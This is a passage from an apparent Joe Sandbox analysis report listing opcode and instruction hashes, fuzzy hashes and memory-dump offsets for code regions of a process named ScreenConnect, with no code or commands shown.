                                                                                                                                                                                                                                                    • Instruction ID: 4b28fdcb65e3398820eaa5427c67345513e580486218667a8ee9c84d50dbb698
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c74147af4de43dc4988da2b3562ed95cd9c7be37ab47f41908130c90e491ff0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3416CB4600705CFCB74DF69D944A5ABBF5FF84310B148A28D456CB7A5EB30E945CBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9049be3e5ccbc4090fe68f33ef0775025328768eb7f4281437e94c52275edd17
                                                                                                                                                                                                                                                    • Instruction ID: 7f9fe8cc3c262fd859df52ae42c208ede9758f0f1f4c7ae6eff08b53d055fc0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9049be3e5ccbc4090fe68f33ef0775025328768eb7f4281437e94c52275edd17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18316B31B102068FDB149F69C594AAFFBF6EF89314F14846AE406E7395DB32DD058BA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 954499e496fe03c50d8c192493a9136386f7621f1d8ac33a1a611fad9c2bd119
                                                                                                                                                                                                                                                    • Instruction ID: 7fa43dd3f3e3ebe9059797ca377239083986904f9c48ef9e89d66a82fbee963c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 954499e496fe03c50d8c192493a9136386f7621f1d8ac33a1a611fad9c2bd119
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E231B470F442458FC705DB68C8645AEFFB6EFCA310B1580AAD549DB395DB319E01CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 533df216d1eb3e934fb9b3cc48b282a1e561e20d9a8b93e1ff2325e50ba25d22
                                                                                                                                                                                                                                                    • Instruction ID: 6d640afc147c6b6a6b5edef9edc532a69de21ea977b294500d042fc27b14f6d9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 533df216d1eb3e934fb9b3cc48b282a1e561e20d9a8b93e1ff2325e50ba25d22
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38315030600B058FC730DF69D984A56B7F2FF99321B144A2CD496CB7A5D730E845CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 74f0d27ebe31d8b6b9594716097896fe05466c9690cae4a93c7d41f3015de9a7
                                                                                                                                                                                                                                                    • Instruction ID: 18ca9202a83a689838f0a777b8685a3ca26689e174ee864473dcc0cb7a903d14
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74f0d27ebe31d8b6b9594716097896fe05466c9690cae4a93c7d41f3015de9a7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E316136A0010ADFCF05DFA8E9405CDBBB2FF89315F158426D505BB264DB32A90BCBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a7db2ba7c552a5a1f661ae3889ca8ada33a3537c77455c605fb6e2beab38e2c4
                                                                                                                                                                                                                                                    • Instruction ID: a0a203f9bcddaa0ff658a1367f9d23be965365740de31a572035e5e8cffcf375
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7db2ba7c552a5a1f661ae3889ca8ada33a3537c77455c605fb6e2beab38e2c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521AF39B002045FC714DB7CE8809AEBBA6EFC5260714852AE955CB3A9DB71AD06CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1ce9fec6c7bfd1019c21808c57ecd74ed137a7bc09a872745ddc04f5e1d8a5e7
                                                                                                                                                                                                                                                    • Instruction ID: 3076bfb3024dcbac755e095b8b202407a04f5e6fc51adb795192bb82a0a2ef89
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ce9fec6c7bfd1019c21808c57ecd74ed137a7bc09a872745ddc04f5e1d8a5e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A112134F441418FC7049B68D8905AEFFB1EFC9310B2841BAE9499B391DB319D01CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 83a8cf02dcd2b67bf294032fbd8d5eb98dce2deac610e655cb69cc003c403726
                                                                                                                                                                                                                                                    • Instruction ID: 8f0f231d6822f189c1297a19a3a7d0608045e75466d0f0e35504072aa6317cd3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83a8cf02dcd2b67bf294032fbd8d5eb98dce2deac610e655cb69cc003c403726
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC213E302007058FD734CF29D948A96BBF5EF54320B148B6DD592977A1DB31E94ACFA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3eb7b7cf8f556615ae2410dca99cc28791995e7bc28ceb4b351162a4c835c19e
                                                                                                                                                                                                                                                    • Instruction ID: 04e44f9989513e38c59b03c4121079fccd51404431efc7787d12bf265307eeeb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3eb7b7cf8f556615ae2410dca99cc28791995e7bc28ceb4b351162a4c835c19e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5119039B002005BDB44EB7CE99176EBBA6EFC4300F14C525E155EB3A9DB71AE0987E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5b64ab3b703c2096e7f973f30027d33cc1a358ad831d015440f0fb292d536a07
                                                                                                                                                                                                                                                    • Instruction ID: 59afe5501124afdc9f17e76cd25098a17ec2d7dca684c86d58fcb772c32a9313
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b64ab3b703c2096e7f973f30027d33cc1a358ad831d015440f0fb292d536a07
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6117F35B002045BDB44EB6CE991B6EBBA6EFC4310F008525E5059B399DF71AE0987E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a9d880d504784a8e8308688d72e92421402bf79e74c3cbd4dee7756c20e29ff8
                                                                                                                                                                                                                                                    • Instruction ID: 0d255ec0cc7e03d37cb28fb31d6b811ee579486ec660be18e36b5c24d3c66b97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9d880d504784a8e8308688d72e92421402bf79e74c3cbd4dee7756c20e29ff8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1511547590424A9FCB41DFA8CD409DEBFB1EF46310B14819AD505FB262D7726E0ACBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f122c6a9da7ebdd9c724e707c6cd21fcd200451773256e25b2b62cdbb37f28f3
                                                                                                                                                                                                                                                    • Instruction ID: 3eb140df5cca4bcf9bad8ea0a63e306385808c3a382631c955426e9d0ba1fc38
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f122c6a9da7ebdd9c724e707c6cd21fcd200451773256e25b2b62cdbb37f28f3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B11C134B442428FC7059B68C8A556AFFB1EFC9320B2481AED9459B395DB31DD05CBA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fcbc6788ce3570fcad405f2a0fa8b6c0238567c4fb83aa1780116f9efc5cf15a
                                                                                                                                                                                                                                                    • Instruction ID: 7575c6683d89b976ba8c0a8a0925d3bd5e05b37e1be16b526f4dc99df1660693
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcbc6788ce3570fcad405f2a0fa8b6c0238567c4fb83aa1780116f9efc5cf15a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01110670E00744AFCB11DFA8D800AEEBBB2AFC5310F5884AAD480DB165D7718942CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a4ea099314d157db0e597ac3e0d5bb9f17bd9c694d11f73d2d03079f9f679136
                                                                                                                                                                                                                                                    • Instruction ID: 7d321797bb5e1dae00a5b1b1a29e1d754c5ad74668322a9d2fddae411a283b69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4ea099314d157db0e597ac3e0d5bb9f17bd9c694d11f73d2d03079f9f679136
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A11A170F00605AFDB14DEA9D900AAFB7B6AFC4310F58C476D554D7268D7719A41CBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8f84313a0d72ce492d75eb17f85c5431d5b69121e01fa061f74e3ba39d74ed4a
                                                                                                                                                                                                                                                    • Instruction ID: dd37938a46dae11aef77b4e579a11ad94048acf91b7d8a7a7b6ea544b186923d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f84313a0d72ce492d75eb17f85c5431d5b69121e01fa061f74e3ba39d74ed4a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8411583194000ADBCB05DFA8E9948DCBBB2EF81314F58C455E045AB129DB72ED8ADBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1fb9fcaa18de271f0a5dc62734912ef3d757d8f803f9ceed60d5bd7b126ef71f
                                                                                                                                                                                                                                                    • Instruction ID: 1c834baac8fca806fb12a4234f2de388d68b1de31d30f078bf13358d6f5bc669
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1fb9fcaa18de271f0a5dc62734912ef3d757d8f803f9ceed60d5bd7b126ef71f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF01F53AF043118BC7098BB8984005ABBA6EBC4310324C96BE545DB366DAB2CC098BE0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a808067eba982f86ffc111c2402a7e19652b3d60b45a6f6956ee7af28cfafeb0
                                                                                                                                                                                                                                                    • Instruction ID: 24fdc32ae3b34bcea22d24450daebc1dc34c7617436729a193b6154ea3143d2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a808067eba982f86ffc111c2402a7e19652b3d60b45a6f6956ee7af28cfafeb0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E11163590010A9FCF40DFA8D9409DEBBF5FF49314B108556D509FB261D772AE0ACB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2444777275.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_99d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d7a417385150f6ec0fc015d60b25d75c2749a912c08bb7f7880f5e4bb27c9a13
                                                                                                                                                                                                                                                    • Instruction ID: a468870969eb2eb8154d3c8e10bc6cc1c8323e24158e09d5ac990ace38776c17
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7a417385150f6ec0fc015d60b25d75c2749a912c08bb7f7880f5e4bb27c9a13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C901DB714063449AEB208E1DCDC4B67FF9CEF45324F18C529ED490B286C27D9941C6B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2444777275.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_99d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 630485591e8a8e7b2c6f9a9dd704ff5f935ff6c5a189679ba57fa7500b4ebc15
                                                                                                                                                                                                                                                    • Instruction ID: d779bb4698e05e43260a05b3bafa91f2ee7690cbf61b6446967a44b53504cb24
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 630485591e8a8e7b2c6f9a9dd704ff5f935ff6c5a189679ba57fa7500b4ebc15
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7001006140E3C09EE7128B258C94652BFB8EF57224F1985DBD9888F1A7C2695849C772
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8da8161b11a78ecef1c7a4f8087c4b61ac29a487a04401b40ee49fd2e52158a6
                                                                                                                                                                                                                                                    • Instruction ID: fb67e427017ed64d1d2a77ba308bea2b05780c58440e21466216020870bd8a7e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8da8161b11a78ecef1c7a4f8087c4b61ac29a487a04401b40ee49fd2e52158a6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D601AD7660D3808FC365CF38A840686BBE1AF65700F0988AFE4C5C72C1EA32AC45CB25
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e8d401ad198a11896b8657e0805c3f2b645b257ae48ee5fe863a86fe4cce80e4
                                                                                                                                                                                                                                                    • Instruction ID: f2c2a680529a56914117a7f2cff7e3e8b980a507a09fbed7cf5bba276c9abf5c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8d401ad198a11896b8657e0805c3f2b645b257ae48ee5fe863a86fe4cce80e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F0C8B691C3059FC715CF78D54014ABBE59F85214F09C57FD48DD3250EA39A902DB62
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 495af340ff7861eb42ddd751a6a5584da354ebe3ee5ade25d9a2e97cdf638e21
                                                                                                                                                                                                                                                    • Instruction ID: 3441de68f70c18e5de46d1ff146674c11e790f0fa7ff6124ade75b2786213628
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 495af340ff7861eb42ddd751a6a5584da354ebe3ee5ade25d9a2e97cdf638e21
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F0283A2406004FCB129B3CA8259AA3FA6DFC934030881AED045CB216DF71DC099BE1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3687d449702c33d1c373adebbd95d77f10c9e8408dfece5b0781c5008592df74
                                                                                                                                                                                                                                                    • Instruction ID: e71dc0ed720f1c0d041f8333d61c6de90f42322d862aaf3171d6f31605a241f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3687d449702c33d1c373adebbd95d77f10c9e8408dfece5b0781c5008592df74
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4F08C77B0C3146FDB28CABAA40069BBBDECBD5224B14C07FE55DC3780E975A8018764
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fb6f06f35858cb7f2ecf4abac198da080fdf7099b9bb6d0fbed4f87461358606
                                                                                                                                                                                                                                                    • Instruction ID: 8dbd053605ecc61b8cf8d93a6a50adc6965fb2d6afbe3e60e76a1284c64c7c68
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb6f06f35858cb7f2ecf4abac198da080fdf7099b9bb6d0fbed4f87461358606
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38F0A722706E825FC71152547C540056FD58E56356B2C81E2F054CB28AE911CCC14371
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fd3a56bcd18bdc0a2f494bd4649210e9e0a8e0a9e2a435d6ddf1d55cd0dee4bc
                                                                                                                                                                                                                                                    • Instruction ID: 92f990faca1a19a1df3196faa5dddd262c7ccddd47b0be46ae678c1a4be2f978
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd3a56bcd18bdc0a2f494bd4649210e9e0a8e0a9e2a435d6ddf1d55cd0dee4bc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0B4A350C3904FD326A778B8116983FA1DEE231074849DAD4818F6A7D75AEA09D761
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fa0f9aeb6c1bafa3fe07db3874fd149d83d53001142f2e591ebacf89cc8003bd
                                                                                                                                                                                                                                                    • Instruction ID: 04afa3fb7c612c5b9195cc413b44de516be6ae0e6d06cbb8b64779a631c99a0e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0f9aeb6c1bafa3fe07db3874fd149d83d53001142f2e591ebacf89cc8003bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E536300A008B8B16A66DE82095F3BDADFC9750314803DE409C7304EFB2EC05ABD1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 080a792fb305a12ecb03006e6e6df8600f3f550cff89ae3a9ba1c7997c053c05
                                                                                                                                                                                                                                                    • Instruction ID: ce99df7dcc33ca72752d381a90e81bf0e4c7b2b7ca9fd24c70d8fb1c2ccd6ec1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 080a792fb305a12ecb03006e6e6df8600f3f550cff89ae3a9ba1c7997c053c05
